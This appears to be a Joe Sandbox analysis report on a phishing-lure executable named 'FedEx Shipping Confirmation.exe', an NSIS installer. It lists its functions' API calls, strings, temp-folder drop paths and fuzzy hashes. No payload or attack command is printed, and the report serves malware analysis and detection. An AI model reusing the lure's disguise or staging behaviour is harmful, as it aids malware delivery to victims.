API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\FedEx Shipping Confirmation.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-222047303
Opcode ID: 889c8ef34167dee75fdbefa7f7ea3591ee246ed7a83750caaaa5a9fc269d37bc
Instruction ID: 87c0a3a17ad5e1939fcd37e1134105fdbaf016035d588be57f40016c0fe971d1
Opcode Fuzzy Hash: 889c8ef34167dee75fdbefa7f7ea3591ee246ed7a83750caaaa5a9fc269d37bc
Instruction Fuzzy Hash: CA61D370100605AED720BF269D45F2B3AACFB85B49F40453EF951B62E2DB7C9901CB6D

Function 004030A2 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004030B3
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\FedEx Shipping Confirmation.exe,00000400), ref: 004030CF

Part of subcall function 00406044: GetFileAttributesW.KERNELBASE(?,004030E2,C:\Users\user\Desktop\FedEx Shipping Confirmation.exe,80000000,00000003), ref: 00406048
Part of subcall function 00406044: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 0040606A

GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FedEx Shipping Confirmation.exe,C:\Users\user\Desktop\FedEx Shipping Confirmation.exe,80000000,00000003), ref: 0040311B
GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251

Strings

soft, xrefs: 00403190
C:\Users\user\Desktop\FedEx Shipping Confirmation.exe, xrefs: 004030B9, 004030C8, 004030DC, 004030FC
C:\Users\user\AppData\Local\Temp\, xrefs: 004030A9
Null, xrefs: 00403199
C:\Users\user\Desktop, xrefs: 004030FD, 00403102, 00403108
Inst, xrefs: 00403187
Error launching installer, xrefs: 004030F2
"C:\Users\user\Desktop\FedEx Shipping Confirmation.exe", xrefs: 004030A8
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403278

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\FedEx Shipping Confirmation.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\FedEx Shipping Confirmation.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-2298558398
Opcode ID: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
Instruction ID: 049f7c6d5ff3921a21710fe3aab5a9d19a74ce2d4ccd47fede02a431b1dffc51
Opcode Fuzzy Hash: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
Instruction Fuzzy Hash: A4519F71901204AFDF209FA5DD86BAE7EACAB45356F20817BF500B62D1CA7C9E408B5D

Function 00406591 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004066B3
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\System.dll,?,?), ref: 004066C9
SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406727
CoTaskMemFree.OLE32(00000000,?,?,00000007,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\System.dll,?,?), ref: 00406730
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\System.dll,?,?), ref: 0040675B
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\System.dll,?,?), ref: 004067B5

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406684
Call, xrefs: 004065BE, 00406678, 0040667F, 00406683, 0040669C, 0040669D, 004066B2, 004066C8, 004066F9, 00406725, 0040675A, 00406760, 0040677D, 00406790, 004067AE, 004067B4, 004067BD, 004067F2
Skipped: C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\System.dll, xrefs: 004065B5
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406755

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4024019347-3902716627
Opcode ID: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
Instruction ID: 996034b20cbe1ccfc182dbfd15fdcef075a6e82f48079f00531b92f4adf5a68d
Opcode Fuzzy Hash: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
Instruction Fuzzy Hash: D56135716046119BD720AF24DD84B7B77E4AB85318F25063FF687B32D0DA3C8961865E

Function 004055D9 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\System.dll,00000000,0079A700,761723A0), ref: 00405611
lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\System.dll,00000000,0079A700,761723A0), ref: 00405621
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\System.dll,00000000,0079A700,761723A0), ref: 00405634
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\System.dll), ref: 00405646
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405686
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\System.dll, xrefs: 004055FA, 0040560A, 00405610, 00405633, 0040563F

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\System.dll
API String ID: 2531174081-144184363
Opcode ID: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
Instruction ID: 329114e2e26f34c588cdeed9baab55c5e37b8eaf8a8cec26a94c2fb3a39dc2c1
Opcode Fuzzy Hash: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
Instruction Fuzzy Hash: F921B371900618BACF119F65DD449CFBFB8EF95364F10843AF908B22A0C77A4A50CFA8

Function 004032D9 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403343
GetTickCount.KERNEL32 ref: 004033C7
MulDiv.KERNEL32(?,00000064,?), ref: 004033F0
wsprintfW.USER32 ref: 00403403

Strings

... %d%%, xrefs: 004033FD
STy, xrefs: 0040338D, 0040339F

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$STy
API String ID: 551687249-2882605797
Opcode ID: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
Instruction ID: eb1ee041d621481d77111d3da967b5f6536357fdff7ba477760ccc35d22143eb
Opcode Fuzzy Hash: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
Instruction Fuzzy Hash: FD515F71910219EBCF11CF65DA8469E7FA8AB00756F14417BE804BA2C1C7789B41CBAA

Function 004068D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068EF
wsprintfW.USER32 ref: 0040692A
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040693E

Strings

UXTHEME, xrefs: 004068E1
%s%S.dll, xrefs: 00406924

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction ID: 3d91c3bba12f32b4d8e24f08bfb099957206232b6387f0edcfac50a9fed73821
Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction Fuzzy Hash: 80F0F671501219ABDB20BB68DD0EF9B376CAB00304F10447AA546F10E0EB789B69CB98

Function 6ED21817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6ED21BFF: GlobalFree.KERNEL32(?), ref: 6ED21E74
Part of subcall function 6ED21BFF: GlobalFree.KERNEL32(?), ref: 6ED21E79
Part of subcall function 6ED21BFF: GlobalFree.KERNEL32(?), ref: 6ED21E7E

GlobalFree.KERNEL32(00000000), ref: 6ED218C5
FreeLibrary.KERNEL32(?), ref: 6ED2194B
GlobalFree.KERNEL32(00000000), ref: 6ED21970

Part of subcall function 6ED2243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6ED2246F

Part of subcall function 6ED22810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6ED21896,00000000), ref: 6ED228E0

Part of subcall function 6ED21666: wsprintfW.USER32 ref: 6ED21694

Strings

, xrefs: 6ED21951

Memory Dump Source

Source File: 00000001.00000002.3344883399.000000006ED21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6ED20000, based on PE: true

Associated: 00000001.00000002.3344832397.000000006ED20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.3344933338.000000006ED24000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.3344985953.000000006ED26000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ed20000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 98cdccdbe4802d67259dba2f9d0454338c9216c67a6809fd84a5a456a640bed2
Instruction ID: f761f284af9fc53aae45e3d185d0ef24293b4babea626a5b4f06b75e322335bb
Opcode Fuzzy Hash: 98cdccdbe4802d67259dba2f9d0454338c9216c67a6809fd84a5a456a640bed2
Instruction Fuzzy Hash: CC418071810246EEDB009FE4D9C4BD577ACAB0631DF0488B5FB649E18ADB76C18D8BB0

Function 00406073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00406091
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040352D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819), ref: 004060AC

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406078
nsa, xrefs: 00406080

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-944333549
Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction ID: 3a9c7f2d553a521e2ba94e631897efa79da28a954d47360b9b57a106d7dab247
Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction Fuzzy Hash: 83F09076B40204BFEB00CF69ED05F9EB7ACEB95750F11803AED05F7180E6B099548768

Function 00406422 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,00000000,?,?,?,?,Call,?,00000000,00406693,80000002), ref: 00406468
RegCloseKey.KERNELBASE(?,?,?), ref: 00406473

Strings

Call, xrefs: 00406429

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: 8bbbfa9f798598a3d1dedb2a9c281e33174829b5b93865dedadbfc74a219c892
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: 9F01B132110209BADF21CF51CD05EDB3BA8EB44360F018039FD1692150D738DA64DBA4

Function 6ED21058 Relevance: 4.6, APIs: 3, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalSize.KERNEL32(00000000), ref: 6ED210AA
GlobalAlloc.KERNEL32(00000040,00000000), ref: 6ED210B9
GlobalFree.KERNEL32(00000000), ref: 6ED210D6

Memory Dump Source

Source File: 00000001.00000002.3344883399.000000006ED21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6ED20000, based on PE: true

Associated: 00000001.00000002.3344832397.000000006ED20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.3344933338.000000006ED24000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.3344985953.000000006ED26000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ed20000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: Global$AllocFreeSize
String ID:
API String ID: 465308736-0
Opcode ID: aa03069da197bc415134ad7593b51b53fcd7506c71cc32cf41384e239314e9d0
Instruction ID: 5a11dd942191ceeabe72bceaf9ac76d29c348859da5ca2f51a0bd14d47ea29e1
Opcode Fuzzy Hash: aa03069da197bc415134ad7593b51b53fcd7506c71cc32cf41384e239314e9d0
Instruction Fuzzy Hash: EC019272504601AFD710ABF56A44D9B37ECAF49618700C536FB04CB240EB76C94A4BA5

Function 6ED21774 Relevance: 3.8, APIs: 3, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6ED21BFF: GlobalFree.KERNEL32(?), ref: 6ED21E74
Part of subcall function 6ED21BFF: GlobalFree.KERNEL32(?), ref: 6ED21E79
Part of subcall function 6ED21BFF: GlobalFree.KERNEL32(?), ref: 6ED21E7E

CloseHandle.KERNELBASE(00000000), ref: 6ED217DC

Part of subcall function 6ED21312: GlobalAlloc.KERNEL32(00000040,?,?,6ED215FE,?), ref: 6ED21328
Part of subcall function 6ED21312: lstrcpynW.KERNEL32(00000004,?,?,6ED215FE,?), ref: 6ED2133E

Memory Dump Source

Source File: 00000001.00000002.3344883399.000000006ED21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6ED20000, based on PE: true

Associated: 00000001.00000002.3344832397.000000006ED20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.3344933338.000000006ED24000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.3344985953.000000006ED26000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ed20000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: Global$Free$AllocCloseHandlelstrcpyn
String ID:
API String ID: 363591596-0
Opcode ID: 44813105ae00fbe90c155eefe9e6801eb84dcfe8025c7597f87e3fd9323189fd
Instruction ID: 6dac3454f70fb65ed6da03602216692eef01aa9881fffb2d2197ac203e99d319
Opcode Fuzzy Hash: 44813105ae00fbe90c155eefe9e6801eb84dcfe8025c7597f87e3fd9323189fd
Instruction Fuzzy Hash: 3001A132408641AEDA509BF4DA44FCA77E8AF8631CF04C879F7849B144DB27944D8BB6

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
